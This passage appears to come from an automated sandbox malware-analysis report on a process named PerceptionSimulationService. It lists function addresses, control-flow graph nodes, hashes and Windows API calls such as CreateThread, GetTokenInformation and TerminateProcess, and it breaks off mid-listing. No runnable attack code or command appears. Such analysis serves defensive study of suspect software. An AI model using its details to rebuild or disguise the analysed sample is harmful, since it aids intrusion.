                                        • Instruction Fuzzy Hash: CD21B03060CF458FCB6A9B1884D87F82EE1FB5535CF6809A69047CF1A3FA248D48A716
                                        Function 00545B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 409 545b87-545b99 CreateThread 410 545b1c-545b3b 409->410 411 545cff-545d01 409->411 410->411 412 545bb4-545ce4 CreateThread 411->412 413 545d07 411->413 419 545c01-545c05 CloseHandle 412->419 420 545cea 412->420 413->412 415 545d0d 413->415 418 545d37-545d41 415->418 421 545d43 418->421 422 545d4b-545d52 418->422 419->418 427 545c20-545c68 419->427 420->419 424 545cf0-545cf6 420->424 425 545d54 421->425 422->425 426 545d45-545d47 422->426 424->427 428 545d5f 426->428 429 545d49 426->429 431 545d65 428->431 429->422 429->428 431->431
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: 4359e14aefa73c9c83cbeb62bb32a3486051b077a69b5865e898a264d27d4df9
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: 2DE0863060DB444FDB5A9B2458243593EE5FB88318F1545CEC44BD71D6EF690D064782
                                        Function 0054599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 432 54599b-54599e 433 5459f7 432->433 434 5459b8 call 560df0 432->434 436 545a02 433->436 438 5459bd-5459c2 call 545d90 434->438 440 5459d4-545a15 call 5611a0 436->440 441 54597d 436->441 443 5459c7-5459ce 438->443 441->440 444 54597f-545981 441->444 447 5459d0 443->447 448 545a1a-545a26 call 545e10 443->448 445 545983-545a38 444->445 453 545994-54599c 445->453 454 545a3e call 572190 445->454 447->448 452 5459d2 447->452 448->453 462 545a0d 448->462 452->440 453->436 457 54599e 453->457 454->453 468 5459e0 454->468 457->433 466 545991 462->466 467 545932 462->467 466->467 469 545993 466->469 471 5459e4-5459ec call 5721ac 467->471 468->453 470 5459e2 468->470 469->453 470->471 474 545a62-545a6e 471->474 475 5459ed 471->475 476 545a75-545ab3 call 561280 474->476 477 545a70 474->477 475->445 478 5459ee-5459ef 475->478 488 545ab5 476->488 489 545abb-545ac9 476->489 477->476 479 545a72 477->479 478->445 481 5459f1 call 579970 478->481 479->476 481->434 488->489 490 545ab7-545ab9 488->490 491 545af2-545af5 489->491 490->489 494 545ad5 491->494 495 545adb-545adc 491->495 494->495 496 545ad7-545ad9 494->496 497 545a45-545a46 495->497 498 545ae2 495->498 496->495 498->497 499 545ae8 498->499 499->491
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: 25bcbd03c4af5bcfacd1beb5e12f657b9547dec78a4237fb82e5c17da44d8956
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 0E01F970A1DE85CFD75B971844492F96E51FB9432CF68495A908EC7193F9344D04D342
                                        Function 00545BE2 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 500 545be2-545be5 501 545be7-545ca3 500->501 502 545bfc-545c05 CloseHandle 500->502 506 545ca5 501->506 507 545ca8-545cb3 call 545e10 501->507 508 545d37-545d41 502->508 509 545c20-545c68 502->509 506->507 510 545ca7 506->510 516 545cb5 507->516 517 545d26 507->517 513 545d43 508->513 514 545d4b-545d52 508->514 510->507 518 545d54 513->518 514->518 519 545d45-545d47 514->519 516->517 520 545cb7 516->520 523 545d27-545d2a call 545910 517->523 521 545d5f 519->521 522 545d49 519->522 525 545d5b-545d5d 520->525 527 545d65 521->527 522->514 522->521 528 545d2e 523->528 525->521 527->527 528->525
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction ID: 0d8858ea065ca2220240dc58c6a3cffb72e3430fcc900ceafe2952875fe3727d
                                        • Opcode Fuzzy Hash: 5b5d7b071b63003723a190de38853bb16d482f491faa3db3b767200ea78fc1cb
                                        • Instruction Fuzzy Hash: 9CE0C231928E1ACFEB55A618C8893F52EC0FF2436D3240D218803CB113F514CF06AB42
                                        Function 00548090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 529 548090-548096 530 548184 529->530 531 54813c-5481a5 529->531 532 548186 CloseHandle 530->532 533 54818c-548192 530->533 543 5481a7 531->543 544 5481bd-5481ca 531->544 532->533 535 548194 533->535 536 548115-548118 533->536 535->536 540 54819a 535->540 538 5480a7 536->538 539 548119-54811a 536->539 539->538 542 54811c 539->542 540->531 545 54820f 542->545 550 5481d0 544->550 551 5480f3 544->551 546 548215-54821e 545->546 547 54808e-548096 545->547 546->547 554 548224 546->554 547->530 561 5480c3 550->561 562 5481fe-548201 GetTokenInformation 550->562 552 5480f5 551->552 553 54808c 551->553 552->553 564 548077 552->564 553->547 558 548226 554->558 559 5481d7-5481e6 call 57715c 554->559 558->559 560 548228-5482ee call 545d90 558->560 570 5480ca-54810f GetTokenInformation 559->570 581 548089 559->581 586 5482f0 560->586 587 54830c-548320 call 545d90 call 54ec00 560->587 561->562 566 5480c9 561->566 562->545 573 5481b7 562->573 564->559 566->570 578 548111 570->578 579 54812d 570->579 573->545 577 5481b9-5481bb 573->577 577->544 578->579 583 548113 578->583 584 548133-5481f0 579->584 585 5480a8 579->585 581->570 582 54808b 581->582 582->553 583->536 596 5481f6 584->596 597 5480da-5480f1 584->597 589 5480aa-5480ad 585->589 586->587 588 5482f2 586->588 592 5482f7-5482fc call 545d90 587->592 616 548322 587->616 588->592 594 548163-548170 call 577164 589->594 595 5480b3-548203 589->595 608 548302 592->608 609 548253-548265 call 561280 592->609 594->532 610 548172 594->610 595->594 603 548209 595->603 596->597 602 5481fc 596->602 597->589 602->562 608->609 613 548308-54830a 608->613 618 548328 609->618 619 54826b 609->619 610->533 613->587 616->592 620 548324-548326 616->620 624 548335 618->624 625 5482df-54832b 618->625 619->618 623 54823f-548243 619->623 620->618 623->592 628 548287 624->628 629 54829b-54829d 624->629 625->624 630 54832d-548331 625->630 628->629 632 54824e-548252 628->632 630->624 632->609
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: adc44f8cf9e97c632eb6b452512afc57d8f9b62661d189a1f92a09ff516725e0
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 70C08C7056888296623802880C0F0FC3E00B20635CB0C28078C0381220DD149E03C097
                                        Function 0054817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 54817f 634 548184 633->634 635 548186 CloseHandle 634->635 636 54818c-548192 634->636 635->636 637 548194 636->637 638 548115-548118 636->638 637->638 641 54819a-5481a5 637->641 639 5480a7 638->639 640 548119-54811a 638->640 640->639 642 54811c 640->642 651 5481a7 641->651 652 5481bd-5481ca 641->652 644 54820f 642->644 646 548215-54821e 644->646 647 54808e-548096 644->647 646->647 653 548224 646->653 647->634 659 5481d0 652->659 660 5480f3 652->660 654 548226 653->654 655 5481d7-5481e6 call 57715c 653->655 654->655 657 548228-5482ee call 545d90 654->657 676 548089 655->676 677 5480ca-54810f GetTokenInformation 655->677 682 5482f0 657->682 683 54830c-548320 call 545d90 call 54ec00 657->683 672 5480c3 659->672 673 5481fe-548201 GetTokenInformation 659->673 663 5480f5 660->663 664 54808c 660->664 663->664 674 548077 663->674 664->647 672->673 679 5480c9 672->679 673->644 690 5481b7 673->690 674->655 676->677 678 54808b 676->678 685 548111 677->685 686 54812d 677->686 678->664 679->677 682->683 684 5482f2 682->684 689 5482f7-5482fc call 545d90 683->689 719 548322 683->719 684->689 685->686 691 548113 685->691 693 548133-5481f0 686->693 694 5480a8 686->694 706 548302 689->706 707 548253-548265 call 561280 689->707 690->644 696 5481b9-5481bb 690->696 691->638 704 5481f6 693->704 705 5480da-5480f1 693->705 697 5480aa-5480ad 694->697 696->652 701 548163-548170 call 577164 697->701 702 5480b3-548203 697->702 701->635 718 548172 701->718 702->701 712 548209 702->712 704->705 711 5481fc 704->711 705->697 706->707 713 548308-54830a 706->713 721 548328 707->721 722 54826b 707->722 711->673 713->683 718->636 719->689 724 548324-548326 719->724 728 548335 721->728 729 5482df-54832b 721->729 722->721 727 54823f-548243 722->727 724->721 727->689 732 548287 728->732 733 54829b-54829d 728->733 729->728 734 54832d-548331 729->734 732->733 736 54824e-548252 732->736 734->728 736->707
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.2948944745.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_540000_PerceptionSimulationService.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: c4fdb6359c81256bcc9ed649872d79b7cd7818aab9904ffe55d7fa6c9302413a
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 84C092B499855987613826C82C0E0FD3D50761B768F0C6823EC178B364DD686D53C1A2

                                        Execution Graph

                                        Execution Coverage:0.2%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:6%
                                        Total number of Nodes:927
                                        Total number of Limit Nodes:2
                                        execution_graph 6665 7a727a 6675 79fd79 6665->6675 6668 7a729e 6683 7a15d3 6668->6683 6669 7a72b5 6672 7a72ae 6669->6672 6674 7a75b7 46 API calls 6669->6674 6674->6669 6676 79fd8c 6675->6676 6677 79fd96 6675->6677 6676->6668 6676->6669 6677->6676 6689 7a185b GetLastError 6677->6689 6679 79fdb7 6709 7a1964 6679->6709 6684 7a18df __dosmaperr 20 API calls 6683->6684 6685 7a15d8 6684->6685 6686 7a1517 6685->6686 7136 7a149c 6686->7136 6688 7a1523 6688->6672 6690 7a1877 6689->6690 6691 7a1871 6689->6691 6695 7a18c6 SetLastError 6690->6695 6724 7a2039 6690->6724 6717 7a2206 6691->6717 6695->6679 6696 7a1891 6731 7a2096 6696->6731 6700 7a18ad 6744 7a1797 6700->6744 6701 7a1897 6702 7a18d2 SetLastError 6701->6702 6749 7a1ff6 6702->6749 6706 7a2096 _free 20 API calls 6708 7a18bf 6706->6708 6708->6695 6708->6702 6710 79fdd0 6709->6710 6711 7a1977 6709->6711 6713 7a1991 6710->6713 6711->6710 7101 7a274c 6711->7101 6714 7a19b9 6713->6714 6715 7a19a4 6713->6715 6714->6676 6715->6714 7122 7a2d39 6715->7122 6760 7a20ef 6717->6760 6719 7a222d 6720 7a2245 TlsGetValue 6719->6720 6721 7a2239 6719->6721 6720->6721 6766 7a4c0d 6721->6766 6723 7a2256 6723->6690 6729 7a2046 __dosmaperr 6724->6729 6725 7a2086 6728 7a15d3 __dosmaperr 19 API calls 6725->6728 6726 7a2071 RtlAllocateHeap 6727 7a1889 6726->6727 6726->6729 6727->6696 6737 7a225c 6727->6737 6728->6727 6729->6725 6729->6726 6781 7a4356 6729->6781 6732 7a20ca __dosmaperr 6731->6732 6733 7a20a1 HeapFree 6731->6733 6732->6701 6733->6732 6734 7a20b6 6733->6734 6735 7a15d3 __dosmaperr 18 API calls 6734->6735 6736 7a20bc GetLastError 6735->6736 6736->6732 6738 7a20ef __dosmaperr 5 API calls 6737->6738 6739 7a2283 6738->6739 6740 7a229e TlsSetValue 6739->6740 6741 7a2292 6739->6741 6740->6741 6742 7a4c0d __startOneArgErrorHandling 5 API calls 6741->6742 6743 7a18a6 6742->6743 6743->6696 6743->6700 6797 7a176f 6744->6797 6945 7a412e 6749->6945 6752 7a2010 IsProcessorFeaturePresent 6755 7a201b 6752->6755 6753 7a202e 6979 7a402c 6753->6979 6973 7a1361 6755->6973 6757 7a2006 6757->6752 6757->6753 6761 7a211b 6760->6761 6762 7a211f __dosmaperr 6760->6762 6761->6762 6765 7a213f 6761->6765 6773 7a218b 6761->6773 6762->6719 6764 7a214b GetProcAddress 6764->6762 6765->6762 6765->6764 6767 7a4c18 IsProcessorFeaturePresent 6766->6767 6768 7a4c16 6766->6768 6770 7a4cb7 6767->6770 6768->6723 6780 7a4c7b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6770->6780 6772 7a4d9a 6772->6723 6774 7a21ac LoadLibraryExW 6773->6774 6779 7a21a1 6773->6779 6775 7a21c9 GetLastError 6774->6775 6776 7a21e1 6774->6776 6775->6776 6777 7a21d4 LoadLibraryExW 6775->6777 6778 7a21f8 FreeLibrary 6776->6778 6776->6779 6777->6776 6778->6779 6779->6761 6780->6772 6786 7a439a 6781->6786 6783 7a4c0d __startOneArgErrorHandling 5 API calls 6784 7a4396 6783->6784 6784->6729 6785 7a436c 6785->6783 6787 7a43a6 _abort 6786->6787 6792 7a2813 RtlEnterCriticalSection 6787->6792 6789 7a43b1 6793 7a43e3 6789->6793 6791 7a43d8 _abort 6791->6785 6792->6789 6796 7a282a RtlLeaveCriticalSection 6793->6796 6795 7a43ea 6795->6791 6796->6795 6803 7a16ff 6797->6803 6799 7a1793 6800 7a1747 6799->6800 6814 7a16af 6800->6814 6802 7a176b 6802->6706 6804 7a170b _abort 6803->6804 6809 7a2813 RtlEnterCriticalSection 6804->6809 6806 7a1715 6810 7a173b 6806->6810 6808 7a1733 _abort 6808->6799 6809->6806 6813 7a282a RtlLeaveCriticalSection 6810->6813 6812 7a1745 6812->6808 6813->6812 6815 7a16bb _abort 6814->6815 6822 7a2813 RtlEnterCriticalSection 6815->6822 6817 7a16c5 6823 7a1810 6817->6823 6819 7a16dd 6827 7a16f3 6819->6827 6821 7a16eb _abort 6821->6802 6822->6817 6824 7a1846 __fassign 6823->6824 6825 7a181f __fassign 6823->6825 6824->6819 6825->6824 6830 7a24ff 6825->6830 6944 7a282a RtlLeaveCriticalSection 6827->6944 6829 7a16fd 6829->6821 6831 7a257f 6830->6831 6835 7a2515 6830->6835 6832 7a25cd 6831->6832 6834 7a2096 _free 20 API calls 6831->6834 6898 7a2672 6832->6898 6836 7a25a1 6834->6836 6835->6831 6837 7a2548 6835->6837 6840 7a2096 _free 20 API calls 6835->6840 6838 7a2096 _free 20 API calls 6836->6838 6839 7a256a 6837->6839 6845 7a2096 _free 20 API calls 6837->6845 6841 7a25b4 6838->6841 6842 7a2096 _free 20 API calls 6839->6842 6843 7a253d 6840->6843 6844 7a2096 _free 20 API calls 6841->6844 6846 7a2574 6842->6846 6858 7a3073 6843->6858 6850 7a25c2 6844->6850 6851 7a255f 6845->6851 6852 7a2096 _free 20 API calls 6846->6852 6847 7a263b 6848 7a2096 _free 20 API calls 6847->6848 6853 7a2641 6848->6853 6855 7a2096 _free 20 API calls 6850->6855 6886 7a3171 6851->6886 6852->6831 6853->6824 6854 7a25db 6854->6847 6857 7a2096 20 API calls _free 6854->6857 6855->6832 6857->6854 6859 7a3084 6858->6859 6885 7a316d 6858->6885 6860 7a3095 6859->6860 6861 7a2096 _free 20 API calls 6859->6861 6862 7a30a7 6860->6862 6863 7a2096 _free 20 API calls 6860->6863 6861->6860 6864 7a2096 _free 20 API calls 6862->6864 6865 7a30b9 6862->6865 6863->6862 6864->6865 6866 7a2096 _free 20 API calls 6865->6866 6868 7a30cb 6865->6868 6866->6868 6867 7a30dd 6870 7a30ef 6867->6870 6871 7a2096 _free 20 API calls 6867->6871 6868->6867 6869 7a2096 _free 20 API calls 6868->6869 6869->6867 6872 7a3101 6870->6872 6873 7a2096 _free 20 API calls 6870->6873 6871->6870 6874 7a3113 6872->6874 6875 7a2096 _free 20 API calls 6872->6875 6873->6872 6876 7a3125 6874->6876 6877 7a2096 _free 20 API calls 6874->6877 6875->6874 6878 7a3137 6876->6878 6879 7a2096 _free 20 API calls 6876->6879 6877->6876 6880 7a3149 6878->6880 6881 7a2096 _free 20 API calls 6878->6881 6879->6878 6882 7a315b 6880->6882 6883 7a2096 _free 20 API calls 6880->6883 6881->6880 6884 7a2096 _free 20 API calls 6882->6884 6882->6885 6883->6882 6884->6885 6885->6837 6887 7a317e 6886->6887 6897 7a31d6 6886->6897 6888 7a318e 6887->6888 6889 7a2096 _free 20 API calls 6887->6889 6890 7a2096 _free 20 API calls 6888->6890 6894 7a31a0 6888->6894 6889->6888 6890->6894 6891 7a2096 _free 20 API calls 6892 7a31b2 6891->6892 6893 7a31c4 6892->6893 6895 7a2096 _free 20 API calls 6892->6895 6896 7a2096 _free 20 API calls 6893->6896 6893->6897 6894->6891 6894->6892 6895->6893 6896->6897 6897->6839 6899 7a267f 6898->6899 6903 7a269d 6898->6903 6899->6903 6904 7a3216 6899->6904 6902 7a2096 _free 20 API calls 6902->6903 6903->6854 6905 7a2697 6904->6905 6906 7a3227 6904->6906 6905->6902 6940 7a31da 6906->6940 6909 7a31da __fassign 20 API calls 6910 7a323a 6909->6910 6911 7a31da __fassign 20 API calls 6910->6911 6912 7a3245 6911->6912 6913 7a31da __fassign 20 API calls 6912->6913 6914 7a3250 6913->6914 6915 7a31da __fassign 20 API calls 6914->6915 6916 7a325e 6915->6916 6917 7a2096 _free 20 API calls 6916->6917 6918 7a3269 6917->6918 6919 7a2096 _free 20 API calls 6918->6919 6920 7a3274 6919->6920 6921 7a2096 _free 20 API calls 6920->6921 6922 7a327f 6921->6922 6923 7a31da __fassign 20 API calls 6922->6923 6924 7a328d 6923->6924 6925 7a31da __fassign 20 API calls 6924->6925 6926 7a329b 6925->6926 6927 7a31da __fassign 20 API calls 6926->6927 6928 7a32ac 6927->6928 6929 7a31da __fassign 20 API calls 6928->6929 6930 7a32ba 6929->6930 6931 7a31da __fassign 20 API calls 6930->6931 6932 7a32c8 6931->6932 6933 7a2096 _free 20 API calls 6932->6933 6934 7a32d3 6933->6934 6935 7a2096 _free 20 API calls 6934->6935 6936 7a32de 6935->6936 6937 7a2096 _free 20 API calls 6936->6937 6938 7a32e9 6937->6938 6939 7a2096 _free 20 API calls 6938->6939 6939->6905 6941 7a3211 6940->6941 6942 7a3201 6940->6942 6941->6909 6942->6941 6943 7a2096 _free 20 API calls 6942->6943 6943->6942 6944->6829 6982 7a409c 6945->6982 6948 7a414e 6949 7a415a _abort 6948->6949 6953 7a4187 _abort 6949->6953 6956 7a4181 _abort 6949->6956 6996 7a18df GetLastError 6949->6996 6951 7a41d3 6952 7a15d3 __dosmaperr 20 API calls 6951->6952 6954 7a41d8 6952->6954 6959 7a41ff 6953->6959 7015 7a2813 RtlEnterCriticalSection 6953->7015 6955 7a1517 _abort 26 API calls 6954->6955 6958 7a41b6 6955->6958 6956->6951 6956->6953 6956->6958 6958->6757 6962 7a425e 6959->6962 6966 7a4256 6959->6966 6970 7a4289 6959->6970 7016 7a282a RtlLeaveCriticalSection 6959->7016 6961 7a402c _abort 28 API calls 6961->6962 6962->6970 7017 7a4145 6962->7017 6966->6961 6967 7a185b _abort 38 API calls 6971 7a42ec 6967->6971 6969 7a4145 _abort 38 API calls 6969->6970 7020 7a430e 6970->7020 6971->6958 6972 7a185b _abort 38 API calls 6971->6972 6972->6958 6974 7a137d _abort 6973->6974 6975 7a13a9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6974->6975 6978 7a147a _abort 6975->6978 6976 7a4c0d __startOneArgErrorHandling 5 API calls 6977 7a1498 6976->6977 6977->6753 6978->6976 7025 7a3e24 6979->7025 6981 7a2038 6985 7a4042 6982->6985 6984 7a1ffb 6984->6757 6984->6948 6986 7a404e _abort 6985->6986 6991 7a2813 RtlEnterCriticalSection 6986->6991 6988 7a405c 6992 7a4090 6988->6992 6990 7a4083 _abort 6990->6984 6991->6988 6995 7a282a RtlLeaveCriticalSection 6992->6995 6994 7a409a 6994->6990 6995->6994 6997 7a18f8 6996->6997 6998 7a18fe 6996->6998 6999 7a2206 __dosmaperr 11 API calls 6997->6999 7000 7a2039 __dosmaperr 17 API calls 6998->7000 7002 7a1955 SetLastError 6998->7002 6999->6998 7001 7a1910 7000->7001 7003 7a1918 7001->7003 7004 7a225c __dosmaperr 11 API calls 7001->7004 7005 7a195e 7002->7005 7006 7a2096 _free 17 API calls 7003->7006 7007 7a192d 7004->7007 7005->6956 7008 7a191e 7006->7008 7007->7003 7009 7a1934 7007->7009 7010 7a194c SetLastError 7008->7010 7011 7a1797 __dosmaperr 17 API calls 7009->7011 7010->7005 7012 7a193f 7011->7012 7013 7a2096 _free 17 API calls 7012->7013 7014 7a1945 7013->7014 7014->7002 7014->7010 7015->6959 7016->6966 7018 7a185b _abort 38 API calls 7017->7018 7019 7a414a 7018->7019 7019->6969 7021 7a42dd 7020->7021 7022 7a4314 7020->7022 7021->6958 7021->6967 7021->6971 7024 7a282a RtlLeaveCriticalSection 7022->7024 7024->7021 7026 7a3e30 _abort 7025->7026 7034 7a3e48 7026->7034 7044 7a3f7e GetModuleHandleW 7026->7044 7033 7a3ec5 7037 7a3edd 7033->7037 7057 7a47ae 7033->7057 7053 7a2813 RtlEnterCriticalSection 7034->7053 7035 7a3e50 7035->7033 7043 7a3eee 7035->7043 7054 7a49a3 7035->7054 7036 7a3f37 7036->6981 7041 7a47ae _abort 5 API calls 7037->7041 7041->7043 7061 7a3f2e 7043->7061 7045 7a3e3c 7044->7045 7045->7034 7046 7a3fc2 GetModuleHandleExW 7045->7046 7047 7a3fec GetProcAddress 7046->7047 7048 7a4001 7046->7048 7047->7048 7049 7a401e 7048->7049 7050 7a4015 FreeLibrary 7048->7050 7051 7a4c0d __startOneArgErrorHandling 5 API calls 7049->7051 7050->7049 7052 7a4028 7051->7052 7052->7034 7053->7035 7072 7a485b 7054->7072 7059 7a47dd 7057->7059 7058 7a4c0d __startOneArgErrorHandling 5 API calls 7060 7a4806 7058->7060 7059->7058 7060->7037 7094 7a282a RtlLeaveCriticalSection 7061->7094 7063 7a3f07 7063->7036 7064 7a3f3d 7063->7064 7095 7a23fb 7064->7095 7067 7a3f6b 7070 7a3fc2 _abort 8 API calls 7067->7070 7068 7a3f4b GetPEB 7068->7067 7069 7a3f5b GetCurrentProcess TerminateProcess 7068->7069 7069->7067 7071 7a3f73 ExitProcess 7070->7071 7075 7a480a 7072->7075 7074 7a487f 7074->7033 7076 7a4816 _abort 7075->7076 7083 7a2813 RtlEnterCriticalSection 7076->7083 7078 7a4824 7084 7a4883 7078->7084 7082 7a4842 _abort 7082->7074 7083->7078 7085 7a48a3 7084->7085 7088 7a48ab 7084->7088 7086 7a4c0d __startOneArgErrorHandling 5 API calls 7085->7086 7087 7a4831 7086->7087 7090 7a484f 7087->7090 7088->7085 7089 7a2096 _free 20 API calls 7088->7089 7089->7085 7093 7a282a RtlLeaveCriticalSection 7090->7093 7092 7a4859 7092->7082 7093->7092 7094->7063 7096 7a2420 7095->7096 7100 7a2416 7095->7100 7097 7a20ef __dosmaperr 5 API calls 7096->7097 7097->7100 7098 7a4c0d __startOneArgErrorHandling 5 API calls 7099 7a247e 7098->7099 7099->7067 7099->7068 7100->7098 7102 7a2758 _abort 7101->7102 7103 7a185b _abort 38 API calls 7102->7103 7104 7a2761 7103->7104 7107 7a27af _abort 7104->7107 7113 7a2813 RtlEnterCriticalSection 7104->7113 7106 7a277f 7114 7a27c3 7106->7114 7107->6710 7112 7a1ff6 _abort 38 API calls 7112->7107 7113->7106 7115 7a27d1 __fassign 7114->7115 7117 7a2793 7114->7117 7116 7a24ff __fassign 20 API calls 7115->7116 7115->7117 7116->7117 7118 7a27b2 7117->7118 7121 7a282a RtlLeaveCriticalSection 7118->7121 7120 7a27a6 7120->7107 7120->7112 7121->7120 7123 7a2d45 _abort 7122->7123 7124 7a185b _abort 38 API calls 7123->7124 7125 7a2d4f 7124->7125 7127 7a2dd3 _abort 7125->7127 7129 7a1ff6 _abort 38 API calls 7125->7129 7130 7a2096 _free 20 API calls 7125->7130 7131 7a2813 RtlEnterCriticalSection 7125->7131 7132 7a2dca 7125->7132 7127->6714 7129->7125 7130->7125 7131->7125 7135 7a282a RtlLeaveCriticalSection 7132->7135 7134 7a2dd1 7134->7125 7135->7134 7137 7a18df __dosmaperr 20 API calls 7136->7137 7138 7a14b2 7137->7138 7139 7a1511 7138->7139 7143 7a14c0 7138->7143 7147 7a1527 IsProcessorFeaturePresent 7139->7147 7141 7a1516 7142 7a149c _abort 26 API calls 7141->7142 7144 7a1523 7142->7144 7145 7a4c0d __startOneArgErrorHandling 5 API calls 7143->7145 7144->6688 7146 7a14e7 7145->7146 7146->6688 7148 7a1532 7147->7148 7149 7a1361 _abort 8 API calls 7148->7149 7150 7a1547 GetCurrentProcess TerminateProcess 7149->7150 7150->7141 7165 7a2c1a 7166 7a185b _abort 38 API calls 7165->7166 7167 7a2c27 7166->7167 7168 7a2d39 __fassign 38 API calls 7167->7168 7169 7a2c2f 7168->7169 7185 7a29ae 7169->7185 7172 7a2c46 7176 7a2096 _free 20 API calls 7176->7172 7178 7a2c84 7179 7a15d3 __dosmaperr 20 API calls 7178->7179 7184 7a2c89 7179->7184 7180 7a2ccd 7180->7184 7209 7a2884 7180->7209 7181 7a2ca1 7181->7180 7182 7a2096 _free 20 API calls 7181->7182 7182->7180 7184->7176 7186 79fd79 __fassign 38 API calls 7185->7186 7187 7a29c0 7186->7187 7188 7a29cf GetOEMCP 7187->7188 7189 7a29e1 7187->7189 7190 7a29f8 7188->7190 7189->7190 7191 7a29e6 GetACP 7189->7191 7190->7172 7192 7a32fa 7190->7192 7191->7190 7193 7a3338 7192->7193 7197 7a3308 __dosmaperr 7192->7197 7194 7a15d3 __dosmaperr 20 API calls 7193->7194 7196 7a2c57 7194->7196 7195 7a3323 RtlAllocateHeap 7195->7196 7195->7197 7196->7184 7199 7a2ddb 7196->7199 7197->7193 7197->7195 7198 7a4356 __dosmaperr 7 API calls 7197->7198 7198->7197 7200 7a29ae 40 API calls 7199->7200 7201 7a2dfa 7200->7201 7204 7a2e4b IsValidCodePage 7201->7204 7206 7a2e01 7201->7206 7207 7a2e70 _abort 7201->7207 7202 7a4c0d __startOneArgErrorHandling 5 API calls 7203 7a2c7c 7202->7203 7203->7178 7203->7181 7205 7a2e5d GetCPInfo 7204->7205 7204->7206 7205->7206 7205->7207 7206->7202 7212 7a2a86 GetCPInfo 7207->7212 7285 7a2841 7209->7285 7211 7a28a8 7211->7184 7213 7a2b6a 7212->7213 7214 7a2ac0 7212->7214 7217 7a4c0d __startOneArgErrorHandling 5 API calls 7213->7217 7222 7a34ff 7214->7222 7219 7a2c16 7217->7219 7219->7206 7221 7a4706 43 API calls 7221->7213 7223 79fd79 __fassign 38 API calls 7222->7223 7224 7a351f MultiByteToWideChar 7223->7224 7226 7a355d 7224->7226 7227 7a35f5 7224->7227 7229 7a32fa 21 API calls 7226->7229 7233 7a357e _abort 7226->7233 7228 7a4c0d __startOneArgErrorHandling 5 API calls 7227->7228 7230 7a2b21 7228->7230 7229->7233 7236 7a4706 7230->7236 7231 7a35ef 7241 7a361c 7231->7241 7233->7231 7234 7a35c3 MultiByteToWideChar 7233->7234 7234->7231 7235 7a35df GetStringTypeW 7234->7235 7235->7231 7237 79fd79 __fassign 38 API calls 7236->7237 7238 7a4719 7237->7238 7245 7a44e9 7238->7245 7242 7a3628 7241->7242 7244 7a3639 7241->7244 7243 7a2096 _free 20 API calls 7242->7243 7242->7244 7243->7244 7244->7227 7246 7a4504 7245->7246 7247 7a452a MultiByteToWideChar 7246->7247 7248 7a46de 7247->7248 7249 7a4554 7247->7249 7250 7a4c0d __startOneArgErrorHandling 5 API calls 7248->7250 7252 